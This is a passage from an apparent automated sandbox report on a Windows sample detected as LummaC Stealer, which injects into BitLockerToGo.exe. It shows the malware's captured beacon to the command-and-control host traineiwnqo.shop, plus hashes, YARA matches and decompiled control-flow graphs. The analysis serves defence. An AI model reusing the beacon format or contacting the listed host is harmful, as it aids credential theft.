                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 54
                Host: traineiwnqo.shop
                2024-08-31 19:10:10 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 6e 6c 63 7a 6a 72 70 66 77 61 64 66 26 6a 3d
                Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--nlczjrpfwadf&j=
                2024-08-31 19:10:11 UTC798INHTTP/1.1 200 OK
                Date: Sat, 31 Aug 2024 19:10:11 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=5kh51g551c07r657kakk6javgo; expires=Wed, 25 Dec 2024 12:56:50 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7qfH7iFY961igKbHTxD9opMSUISG%2Bh4ci%2FrTWNE8IMWj0CleYSBUim9lJrEsrjt7XjCgTzPmWH42hJAHxMoQnInkDlpahwTlOlq2aSKu245%2BKPWN8zhzA%2FHkwNYe2XkUNkPD"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8bbf51b69b3b8ce2-EWR
                alt-svc: h3=":443"; ma=86400
                2024-08-31 19:10:11 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                Data Ascii: aerror #D12
                2024-08-31 19:10:11 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:15:09:58
                Start date:31/08/2024
                Path:C:\Users\user\Desktop\l5u4ezxr.u51.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\l5u4ezxr.u51.exe"
                Imagebase:0x580000
                File size:17'182'720 bytes
                MD5 hash:5BD0EC56270D24C40AA16D7FA73F2538
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1761754559.0000000002786000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1759655913.00000000022B3000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1761754559.0000000002496000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                Reputation:low
                Has exited:true

                General

                Target ID:1
                Start time:15:10:04
                Start date:31/08/2024
                Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                Imagebase:0x590000
                File size:231'736 bytes
                MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                Reputation:moderate
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:3.4%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:45.1%
                  Total number of Nodes:133
                  Total number of Limit Nodes:12
                  execution_graph 12692 42d702 12693 42d766 SysAllocString 12692->12693 12694 42d724 12692->12694 12695 42d7e5 12693->12695 12696 42d82d SysAllocString 12693->12696 12694->12693 12695->12696 12697 42d849 12696->12697 12698 42db60 VariantClear 12697->12698 12699 42db4f VariantClear 12697->12699 12700 42dc30 GetVolumeInformationW 12697->12700 12701 42d891 VariantInit 12697->12701 12702 42d957 SysStringLen 12697->12702 12703 42db98 SysFreeString SysFreeString 12697->12703 12704 42dbc8 12697->12704 12705 42db6d 12697->12705 12707 42d979 12697->12707 12709 42db00 12697->12709 12698->12705 12699->12698 12700->12709 12708 42d8ea 12701->12708 12702->12707 12706 42dbb4 SysFreeString 12703->12706 12704->12700 12705->12703 12706->12704 12707->12698 12707->12699 12707->12700 12707->12704 12707->12705 12707->12709 12708->12698 12708->12699 12708->12700 12708->12702 12708->12704 12708->12705 12708->12707 12708->12709 12709->12709 12710 409c50 12711 409c59 12710->12711 12727 4321f0 12711->12727 12713 409c63 12714 409c69 GetCurrentProcess 12713->12714 12723 409c67 ExitProcess 12713->12723 12716 409c74 12714->12716 12717 409c78 12716->12717 12718 409c7a GetWindowInfo 12716->12718 12759 432a70 12717->12759 12734 40ab00 12718->12734 12720 409c95 12720->12717 12722 409c9b 12720->12722 12752 40d0d0 12722->12752 12733 432235 12727->12733 12728 432b4f 12729 430e60 RtlFreeHeap 12728->12729 12732 432b58 12729->12732 12730 432ab8 12730->12713 12733->12728 12733->12730 12762 430e60 12733->12762 12735 40ab55 12734->12735 12736 40abac LoadLibraryExW 12734->12736 12735->12736 12738 40abc5 12736->12738 12739 40adc3 12738->12739 12742 40b008 12738->12742 12744 40b07a 12738->12744 12766 40b310 12738->12766 12772 40b900 12739->12772 12740 40b048 CoInitializeEx 12743 40b05a CoInitializeSecurity 12740->12743 12740->12744 12742->12740 12742->12744 12743->12744 12744->12720 12745 40b2ec 12746 430e60 RtlFreeHeap 12745->12746 12746->12744 12747 40b310 RtlFreeHeap 12748 40b298 12747->12748 12748->12745 12749 40b29f 12748->12749 12751 430e60 RtlFreeHeap 12749->12751 12750 40af15 12750->12744 12750->12745 12750->12747 12751->12742 12753 40d1cc 12752->12753 12753->12753 12754 40bf60 RtlFreeHeap 12753->12754 12757 40d51d 12754->12757 12755 40d540 GetSystemDirectoryW 12755->12757 12756 40d5c0 12756->12756 12757->12755 12757->12756 12758 430e60 RtlFreeHeap 12757->12758 12758->12757 12787 433c20 12759->12787 12761 432a75 FreeLibrary 12761->12723 12763 430ee2 RtlFreeHeap 12762->12763 12764 430eee 12762->12764 12765 430e75 12762->12765 12763->12764 12764->12728 12765->12763 12767 40b34c 12766->12767 12767->12767 12776 40bf60 12767->12776 12769 40b6a4 12769->12738 12770 430e60 RtlFreeHeap 12770->12769 12771 40b562 12771->12769 12771->12770 12775 40b990 12772->12775 12773 40b9b5 12773->12750 12774 432a90 RtlFreeHeap 12774->12775 12775->12773 12775->12774 12775->12775 12777 40be48 12776->12777 12778 40bed4 12777->12778 12780 432a90 12777->12780 12778->12771 12781 432aaa 12780->12781 12784 432ab8 12780->12784 12785 432b4f 12780->12785 12783 430e60 RtlFreeHeap 12781->12783 12781->12784 12781->12785 12782 430e60 RtlFreeHeap 12786 432b58 12782->12786 12783->12785 12784->12777 12785->12782 12786->12786 12788 433c29 12787->12788 12788->12761 12789 4323e3 12790 432472 LoadLibraryExW 12789->12790 12791 432430 12789->12791 12797 4322c7 12790->12797 12791->12790 12791->12791 12792 432b4f 12793 430e60 RtlFreeHeap 12792->12793 12796 432b58 12793->12796 12794 432ab8 12795 430e60 RtlFreeHeap 12795->12792 12797->12792 12797->12794 12797->12795 12798 42b980 12799 42b987 12798->12799 12800 42b99f GetUserDefaultUILanguage 12799->12800 12801 42b9d4 12800->12801 12801->12801 12802 430e40 RtlAllocateHeap 12803 434b10 12805 434b30 12803->12805 12804 434c5e 12805->12804 12807 432b70 LdrInitializeThunk 12805->12807 12807->12804 12808 434f50 12810 434f73 12808->12810 12809 43509e 12812 434fdf 12810->12812 12814 432b70 LdrInitializeThunk 12810->12814 12812->12809 12815 432b70 LdrInitializeThunk 12812->12815 12814->12812 12815->12809 12816 40c223 12820 40c24e 12816->12820 12817 430e60 RtlFreeHeap 12821 40c60d 12817->12821 12818 40c38f 12818->12817 12818->12821 12819 432a90 RtlFreeHeap 12819->12820 12820->12818 12820->12819 12820->12820 12820->12821 12821->12821 12822 42d5b9 12823 42d5cf CoCreateInstance 12822->12823 12825 42d59d 12822->12825 12823->12825 12824 42d69a SysAllocString 12824->12825 12825->12822 12825->12823 12825->12824 12826 42d490 12825->12826 12826->12826 12827 42d6ce CoSetProxyBlanket 12828 432f1c 12829 432f3d 12828->12829 12833 432fae 12829->12833 12841 432b70 LdrInitializeThunk 12829->12841 12830 432ff1 12831 4332de 12831->12831 12833->12830 12834 43311e 12833->12834 12835 43320d 12833->12835 12836 433382 12833->12836 12845 432b70 LdrInitializeThunk 12833->12845 12842 432b70 LdrInitializeThunk 12834->12842 12835->12831 12843 432b70 LdrInitializeThunk 12835->12843 12836->12830 12844 432b70 LdrInitializeThunk 12836->12844 12841->12833 12842->12835 12843->12836 12844->12830 12845->12834

                  Executed Functions

                  Function 0042D702 Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 556memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 42d702-42d722 1 42d766-42d7e3 SysAllocString 0->1 2 42d724 0->2 4 42d7e5 1->4 5 42d82d-42d84e SysAllocString 1->5 3 42d730-42d764 2->3 3->1 3->3 6 42d7f0-42d82b 4->6 8 42db02-42db0b 5->8 9 42db43-42db46 5->9 10 42db20 5->10 11 42dac0-42daf7 5->11 12 42db00 5->12 13 42db60-42db61 VariantClear 5->13 14 42db80-42db84 5->14 15 42db26 5->15 16 42db8a-42db95 5->16 17 42dc09-42dc0b 5->17 18 42db4f-42db56 VariantClear 5->18 19 42db2c-42db3a call 4093e0 5->19 20 42db6d-42db6f 5->20 21 42dbf0-42dc00 call 434110 5->21 22 42dc30-42dc40 GetVolumeInformationW 5->22 23 42d891-42d8e8 VariantInit 5->23 24 42d957-42d977 SysStringLen 5->24 25 42db77-42db7b 5->25 26 42dbd4-42dbe7 call 434110 5->26 27 42dc14-42dc26 5->27 28 42d855-42d86e 5->28 29 42db98-42dbb0 SysFreeString * 2 5->29 6->5 6->6 8->8 8->9 8->10 8->11 8->12 8->13 8->14 8->15 8->16 8->17 8->18 8->19 8->20 8->21 8->22 8->25 8->26 8->27 30 42dc80-42dc8c 8->30 31 42dc48-42dc55 8->31 32 42dca8-42dcc1 8->32 33 42ddcc-42ddd3 8->33 34 42dc93-42dc9e 8->34 35 42dc5c-42dc6d 8->35 9->18 11->8 11->9 11->12 11->13 11->14 11->15 11->16 11->17 11->18 11->19 11->20 11->21 11->22 11->25 11->26 11->27 11->30 11->31 11->32 11->33 11->34 11->35 13->20 14->16 16->29 17->27 18->13 19->9 20->25 21->17 22->31 38 42d8ea 23->38 39 42d92c-42d93b 23->39 41 42d9ba 24->41 42 42d979-42d982 24->42 25->14 26->21 27->22 54 42d872-42d88a 28->54 52 42dbb4-42dbc8 SysFreeString 29->52 30->32 30->34 31->30 31->32 31->33 31->34 31->35 48 42dcc3-42dcca 32->48 49 42dd20-42dd27 32->49 34->32 44 42ddb0 34->44 45 42dd90-42dd9d 34->45 46 42dca5 34->46 35->30 35->32 35->33 35->34 56 42d8f0-42d92a 38->56 65 42d93f-42d950 39->65 43 42d9c1-42d9db call 4093d0 41->43 58 42d993-42d996 42->58 74 42daa2-42dab5 43->74 75 42d9e1-42d9e6 43->75 45->44 45->45 46->32 62 42dd30-42dd35 48->62 63 42dccc-42dccf 48->63 64 42dd66-42dd6b 49->64 52->26 54->8 54->9 54->10 54->11 54->12 54->13 54->14 54->15 54->16 54->17 54->18 54->19 54->20 54->21 54->22 54->23 54->24 54->25 54->26 54->27 54->31 56->39 56->56 58->43 60 42d998-42d9b4 58->60 66 42d9b6-42d9b8 60->66 67 42d984-42d991 60->67 70 42dd11-42dd1c 62->70 71 42dd37-42dd60 62->71 69 42dcd0-42dd0a 63->69 72 42dd70-42dd78 64->72 65->8 65->9 65->10 65->11 65->12 65->13 65->14 65->15 65->16 65->17 65->18 65->19 65->20 65->21 65->22 65->24 65->25 65->26 65->27 65->31 66->67 67->43 67->58 69->69 76 42dd0c-42dd0f 69->76 77 42dd63 70->77 71->77 72->72 78 42dd7a-42dd84 72->78 74->8 74->9 74->10 74->11 74->12 74->13 74->14 74->15 74->16 74->17 74->18 74->19 74->20 74->21 74->22 74->25 74->26 74->27 74->30 74->31 74->32 74->33 74->34 74->35 75->74 79 42d9ec-42da01 75->79 76->70 76->71 77->64 78->44 78->45 80 42da03-42da0a 79->80 80->74 81 42da10-42da14 80->81 82 42da16-42da1d 81->82 83 42da1f-42da2f 81->83 84 42da8d-42da92 82->84 85 42da31-42da37 83->85 86 42da5c-42da64 83->86 84->74 89 42da94-42da9c 84->89 85->86 87 42da39-42da5a 85->87 86->84 88 42da66-42da88 86->88 87->84 88->84 89->74 89->80
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 0042D767
                  • SysAllocString.OLEAUT32(?), ref: 0042D82E
                  • VariantInit.OLEAUT32(?), ref: 0042D894
                  • SysStringLen.OLEAUT32(873A8121), ref: 0042D95D
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: String$Alloc$InitVariant
                  • String ID: /-$31$?=
                  • API String ID: 3520221836-2341783892
                  • Opcode ID: 1971556a049c314b120fa08fe6b060eee15df2ee786ccc502c9e38b77569bbc7
                  • Instruction ID: 155b63241befc0a2a6a4295917ff903a517cb056a1f535e515aa01be428a3c33
                  • Opcode Fuzzy Hash: 1971556a049c314b120fa08fe6b060eee15df2ee786ccc502c9e38b77569bbc7
                  • Instruction Fuzzy Hash: 44128975604B01CFD7288F25E881B16B7B2FF99310F248A6DE4968B7A1D739F841CB54
                  Function 004323E3 Relevance: 23.2, APIs: 1, Strings: 12, Instructions: 481libraryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 90 4323e3-43242e 91 432472-432487 LoadLibraryExW 90->91 92 432430-432470 90->92 93 432652-432659 91->93 94 43248d-4324a2 91->94 92->91 92->92 95 43265e-432675 93->95 96 432342-43234d 94->96 97 432511-432528 94->97 98 432330-43233b 94->98 99 4323a0-4323ab 94->99 100 432354-43235f 94->100 101 432604-432610 94->101 102 4324a9-4324b1 94->102 103 432598-4325a3 94->103 104 4324ff-43250a 94->104 105 4324ed-4324f8 94->105 106 43267c-432687 94->106 95->96 95->97 95->98 95->99 95->100 95->101 95->103 95->104 95->105 95->106 96->97 96->100 96->101 96->103 96->104 96->105 97->96 97->97 97->98 97->99 97->100 97->101 97->103 97->104 97->105 97->106 107 43252f-43253a 97->107 98->96 98->97 98->99 98->100 98->101 98->103 98->104 98->105 99->102 99->107 120 4323b2-4323bd 99->120 121 4323d6-4323dc 99->121 122 4323c4-4323cf 99->122 123 43256f-43257a 99->123 114 432366-432371 100->114 115 4322ea-4322ff 100->115 116 432639-43264b 100->116 117 432378-432380 100->117 127 43261b-43262d 101->127 102->105 118 4322c7-4322de 103->118 119 4325aa-4325c1 103->119 104->97 104->101 105->97 105->101 105->103 105->104 108 4326b2-4326bd 106->108 109 4327a0-4327ab 106->109 110 4326a0-4326ab 106->110 111 43296b-432976 106->111 112 4329a8-4329b3 106->112 113 43268e-432699 106->113 107->127 130 432553-432559 107->130 131 432541-43254c 107->131 132 4325c8-4325da 107->132 124 432a53-432a5b 108->124 128 4326c4-4326cf 108->128 129 432308-43231f 108->129 109->124 133 4327e3-43282b call 434110 * 3 call 432bb0 109->133 134 4327b2-4327bd 109->134 135 432850-43285b 109->135 136 4327d6-4327dc 109->136 137 432916-43292c call 42ce70 109->137 138 4327c4-4327cf 109->138 139 432904-43290f 109->139 140 4329fb-432a07 109->140 110->108 110->112 111->124 143 432a30-432a47 111->143 144 4329d8-4329ef 111->144 145 43298f-4329a1 111->145 146 43297d-432988 111->146 112->124 125 432a12-432a24 112->125 126 4329ba-4329d1 112->126 113->108 113->110 113->111 113->112 114->116 114->117 115->129 116->95 116->114 116->115 116->116 116->117 117->99 118->115 119->95 119->118 119->119 119->132 120->102 120->121 120->122 120->123 121->95 121->102 121->107 121->120 121->121 121->122 121->123 122->102 122->121 141 432581-43258d 123->141 142 4325e6-4325f8 123->142 151 432aaa-432ab1 124->151 125->143 126->124 126->125 126->126 126->144 164 4326d6-43272a 126->164 127->116 128->124 128->125 128->126 128->164 129->98 129->128 129->129 130->95 130->123 130->127 130->130 130->131 130->132 131->127 131->130 132->142 203 432830-432837 133->203 134->124 134->133 134->136 134->137 134->138 134->139 134->140 135->124 147 432862-43286d 135->147 148 432b42 135->148 149 432b22-432b2f 135->149 150 432b20 135->150 135->151 152 432b49-432b4f call 430e60 135->152 153 432948-432952 135->153 154 4328a8-4328fa call 434110 * 3 135->154 155 432b52-432b58 call 430e60 135->155 156 432b31-432b3a call 430dc0 135->156 157 432896-4328a1 135->157 158 432936-432941 135->158 159 432874 135->159 160 43287a-43288f call 42ce70 135->160 161 432ab8-432ad2 135->161 162 432b3c 135->162 136->124 136->133 136->137 137->158 138->124 138->133 138->136 138->137 138->139 139->124 139->137 140->125 141->103 142->101 143->124 144->140 145->95 145->112 145->143 145->144 145->145 145->146 146->124 146->143 146->145 147->124 147->148 147->149 147->150 147->151 147->152 147->153 147->154 147->155 147->156 147->158 147->159 147->160 147->161 147->162 177 432b44-432b48 148->177 149->177 151->148 151->149 151->150 151->152 151->155 151->161 151->162 152->155 170 432954 153->170 171 432959-432961 153->171 154->139 193 432b5b 155->193 156->177 157->124 157->148 157->149 157->150 157->151 157->152 157->154 157->155 157->156 157->161 157->162 158->124 158->148 158->149 158->150 158->151 158->152 158->153 158->154 158->155 158->156 158->161 158->162 159->160 160->157 174 432b10-432b1f 161->174 175 432ad4 161->175 172 432763-43277c call 433c40 164->172 173 43272c-43272f 164->173 170->171 171->111 196 432783-43278b 172->196 197 43277e 172->197 183 432730-432761 173->183 174->150 185 432ae0-432b0e 175->185 183->172 183->183 185->174 185->185 193->193 196->109 197->196 204 432839 203->204 205 43283e-432846 203->205 204->205 205->135
                  APIs
                  • LoadLibraryExW.KERNELBASE(D96CDB61,00000000,00000800), ref: 0043247E
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: "+C$S*C$S*C$h5'&$h5'&$h5'&$<V $<V $<V $<V $<V $<V
                  • API String ID: 1029625771-3655222479
                  • Opcode ID: 19657a7ca6d6d019b9b5743586cd4272c9b7eab55c5c57369c3dbc89e5ceed37
                  • Instruction ID: 5ccefa3984adca6100e7a8c097a5c0f99ed8c012ab8ae59abf215876d2a827f6
                  • Opcode Fuzzy Hash: 19657a7ca6d6d019b9b5743586cd4272c9b7eab55c5c57369c3dbc89e5ceed37
                  • Instruction Fuzzy Hash: A202F67A95C3A0DFC714AF79B99113B7BF1AB8E302F045C79E09582261E23DC916CB19
                  Function 004321F0 Relevance: 15.5, Strings: 12, Instructions: 497COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 206 4321f0-432233 207 432235 206->207 208 43228a-4322a6 call 433c40 206->208 209 432240-432288 207->209 212 4322b0-4322c0 208->212 213 4322a8 208->213 209->208 209->209 214 432342-43234d 212->214 215 432511-432528 212->215 216 432330-43233b 212->216 217 4323a0-4323ab 212->217 218 4322c7-4322de 212->218 219 432354-43235f 212->219 220 432604-432610 212->220 221 432598-4325a3 212->221 222 4324ff-43250a 212->222 223 4324ed-4324f8 212->223 224 43267c-432687 212->224 213->212 214->215 214->219 214->220 214->221 214->222 214->223 215->214 215->215 215->216 215->217 215->219 215->220 215->221 215->222 215->223 215->224 225 43252f-43253a 215->225 216->214 216->215 216->217 216->219 216->220 216->221 216->222 216->223 217->225 237 4323b2-4323bd 217->237 238 4323d6-4323dc 217->238 239 4323c4-4323cf 217->239 240 4324a9-4324b1 217->240 241 43256f-43257a 217->241 233 4322ea-4322ff 218->233 232 432366-432371 219->232 219->233 234 432639-43264b 219->234 235 432378-432380 219->235 245 43261b-43262d 220->245 221->218 236 4325aa-4325c1 221->236 222->215 222->220 223->215 223->220 223->221 223->222 226 4326b2-4326bd 224->226 227 4327a0-4327ab 224->227 228 4326a0-4326ab 224->228 229 43296b-432976 224->229 230 4329a8-4329b3 224->230 231 43268e-432699 224->231 225->245 249 432553-432559 225->249 250 432541-43254c 225->250 251 4325c8-4325da 225->251 242 432a53-432a5b 226->242 247 4326c4-4326cf 226->247 248 432308-43231f 226->248 227->242 252 4327e3-43282b call 434110 * 3 call 432bb0 227->252 253 4327b2-4327bd 227->253 254 432850-43285b 227->254 255 4327d6-4327dc 227->255 256 432916-43292c call 42ce70 227->256 257 4327c4-4327cf 227->257 258 432904-43290f 227->258 259 4329fb-432a07 227->259 228->226 228->230 229->242 262 432a30-432a47 229->262 263 4329d8-4329ef 229->263 264 43298f-4329a1 229->264 265 43297d-432988 229->265 230->242 243 432a12-432a24 230->243 244 4329ba-4329d1 230->244 231->226 231->228 231->229 231->230 232->234 232->235 233->248 234->232 234->233 234->234 234->235 246 43265e-432675 234->246 235->217 236->218 236->236 236->246 236->251 237->238 237->239 237->240 237->241 238->225 238->237 238->238 238->239 238->240 238->241 238->246 239->238 239->240 240->223 260 432581-43258d 241->260 261 4325e6-4325f8 241->261 270 432aaa-432ab1 242->270 243->262 244->242 244->243 244->244 244->263 283 4326d6-43272a 244->283 245->234 246->214 246->215 246->216 246->217 246->219 246->220 246->221 246->222 246->223 246->224 247->242 247->243 247->244 247->283 248->216 248->247 248->248 249->241 249->245 249->246 249->249 249->250 249->251 250->245 250->249 251->261 322 432830-432837 252->322 253->242 253->252 253->255 253->256 253->257 253->258 253->259 254->242 266 432862-43286d 254->266 267 432b42 254->267 268 432b22-432b2f 254->268 269 432b20 254->269 254->270 271 432b49-432b4f call 430e60 254->271 272 432948-432952 254->272 273 4328a8-4328fa call 434110 * 3 254->273 274 432b52-432b58 call 430e60 254->274 275 432b31-432b3a call 430dc0 254->275 276 432896-4328a1 254->276 277 432936-432941 254->277 278 432874 254->278 279 43287a-43288f call 42ce70 254->279 280 432ab8-432ad2 254->280 281 432b3c 254->281 255->242 255->252 255->256 256->277 257->242 257->252 257->255 257->256 257->258 258->242 258->256 259->243 260->221 261->220 262->242 263->259 264->230 264->246 264->262 264->263 264->264 264->265 265->242 265->262 265->264 266->242 266->267 266->268 266->269 266->270 266->271 266->272 266->273 266->274 266->275 266->277 266->278 266->279 266->280 266->281 296 432b44-432b48 267->296 268->296 270->267 270->268 270->269 270->271 270->274 270->280 270->281 271->274 289 432954 272->289 290 432959-432961 272->290 273->258 312 432b5b 274->312 275->296 276->242 276->267 276->268 276->269 276->270 276->271 276->273 276->274 276->275 276->280 276->281 277->242 277->267 277->268 277->269 277->270 277->271 277->272 277->273 277->274 277->275 277->280 277->281 278->279 279->276 293 432b10-432b1f 280->293 294 432ad4 280->294 291 432763-43277c call 433c40 283->291 292 43272c-43272f 283->292 289->290 290->229 315 432783-43278b 291->315 316 43277e 291->316 302 432730-432761 292->302 293->269 304 432ae0-432b0e 294->304 302->291 302->302 304->293 304->304 312->312 315->227 316->315 323 432839 322->323 324 43283e-432846 322->324 323->324 324->254
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "+C$S*C$S*C$h5'&$h5'&$h5'&$<V $<V $<V $<V $<V $<V
                  • API String ID: 0-3655222479
                  • Opcode ID: 82d9e9839c631e5742dd57d15ccba99f048ec3cfc9623f4b8798b8f75217f765
                  • Instruction ID: d5a696e6ccf25c5229b80cebc97a78327593b2fdca57d2d14fe98f87339d1e9d
                  • Opcode Fuzzy Hash: 82d9e9839c631e5742dd57d15ccba99f048ec3cfc9623f4b8798b8f75217f765
                  • Instruction Fuzzy Hash: 8A02F77A55C3A0EFC714AF39BD9113B7AF1AB8E342F055C79E08582261E23EC516CB19
                  Function 004324BC Relevance: 15.4, Strings: 12, Instructions: 445COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 325 4324bc-4324e6 call 434110 328 432342-43234d 325->328 329 432511-432528 325->329 330 432330-43233b 325->330 331 4323a0-4323ab 325->331 332 432354-43235f 325->332 333 432604-432610 325->333 334 432598-4325a3 325->334 335 4324ff-43250a 325->335 336 4324ed-4324f8 325->336 337 43267c-432687 325->337 328->329 328->332 328->333 328->334 328->335 328->336 329->328 329->329 329->330 329->331 329->332 329->333 329->334 329->335 329->336 329->337 338 43252f-43253a 329->338 330->328 330->329 330->331 330->332 330->333 330->334 330->335 330->336 331->338 351 4323b2-4323bd 331->351 352 4323d6-4323dc 331->352 353 4323c4-4323cf 331->353 354 4324a9-4324b1 331->354 355 43256f-43257a 331->355 345 432366-432371 332->345 346 4322ea-4322ff 332->346 347 432639-43264b 332->347 348 432378-432380 332->348 359 43261b-43262d 333->359 349 4322c7-4322de 334->349 350 4325aa-4325c1 334->350 335->329 335->333 336->329 336->333 336->334 336->335 339 4326b2-4326bd 337->339 340 4327a0-4327ab 337->340 341 4326a0-4326ab 337->341 342 43296b-432976 337->342 343 4329a8-4329b3 337->343 344 43268e-432699 337->344 338->359 363 432553-432559 338->363 364 432541-43254c 338->364 365 4325c8-4325da 338->365 356 432a53-432a5b 339->356 361 4326c4-4326cf 339->361 362 432308-43231f 339->362 340->356 366 4327e3-43281e call 434110 * 3 340->366 367 4327b2-4327bd 340->367 368 432850-43285b 340->368 369 4327d6-4327dc 340->369 370 432916-43292c call 42ce70 340->370 371 4327c4-4327cf 340->371 372 432904-43290f 340->372 373 4329fb-432a07 340->373 341->339 341->343 342->356 376 432a30-432a47 342->376 377 4329d8-4329ef 342->377 378 43298f-4329a1 342->378 379 43297d-432988 342->379 343->356 357 432a12-432a24 343->357 358 4329ba-4329d1 343->358 344->339 344->341 344->342 344->343 345->347 345->348 346->362 347->345 347->346 347->347 347->348 360 43265e-432675 347->360 348->331 349->346 350->349 350->350 350->360 350->365 351->352 351->353 351->354 351->355 352->338 352->351 352->352 352->353 352->354 352->355 352->360 353->352 353->354 354->336 374 432581-43258d 355->374 375 4325e6-4325f8 355->375 384 432aaa-432ab1 356->384 357->376 358->356 358->357 358->358 358->377 397 4326d6-43272a 358->397 359->347 360->328 360->329 360->330 360->331 360->332 360->333 360->334 360->335 360->336 360->337 361->356 361->357 361->358 361->397 362->330 362->361 362->362 363->355 363->359 363->360 363->363 363->364 363->365 364->359 364->363 365->375 433 432823-43282b call 432bb0 366->433 367->356 367->366 367->369 367->370 367->371 367->372 367->373 368->356 380 432862-43286d 368->380 381 432b42 368->381 382 432b22-432b2f 368->382 383 432b20 368->383 368->384 385 432b49-432b4f call 430e60 368->385 386 432948-432952 368->386 387 4328a8-4328fa call 434110 * 3 368->387 388 432b52-432b58 call 430e60 368->388 389 432b31-432b3a call 430dc0 368->389 390 432896-4328a1 368->390 391 432936-432941 368->391 392 432874 368->392 393 43287a-43288f call 42ce70 368->393 394 432ab8-432ad2 368->394 395 432b3c 368->395 369->356 369->366 369->370 370->391 371->356 371->366 371->369 371->370 371->372 372->356 372->370 373->357 374->334 375->333 376->356 377->373 378->343 378->360 378->376 378->377 378->378 378->379 379->356 379->376 379->378 380->356 380->381 380->382 380->383 380->384 380->385 380->386 380->387 380->388 380->389 380->391 380->392 380->393 380->394 380->395 410 432b44-432b48 381->410 382->410 384->381 384->382 384->383 384->385 384->388 384->394 384->395 385->388 403 432954 386->403 404 432959-432961 386->404 387->372 426 432b5b 388->426 389->410 390->356 390->381 390->382 390->383 390->384 390->385 390->387 390->388 390->389 390->394 390->395 391->356 391->381 391->382 391->383 391->384 391->385 391->386 391->387 391->388 391->389 391->394 391->395 392->393 393->390 407 432b10-432b1f 394->407 408 432ad4 394->408 405 432763-43277c call 433c40 397->405 406 43272c-43272f 397->406 403->404 404->342 429 432783-43278b 405->429 430 43277e 405->430 416 432730-432761 406->416 407->383 418 432ae0-432b0e 408->418 416->405 416->416 418->407 418->418 426->426 429->340 430->429 436 432830-432837 433->436 437 432839 436->437 438 43283e-432846 436->438 437->438 438->368
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1797583721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "+C$S*C$S*C$h5'&$h5'&$h5'&$<V $<V $<V $<V $<V $<V
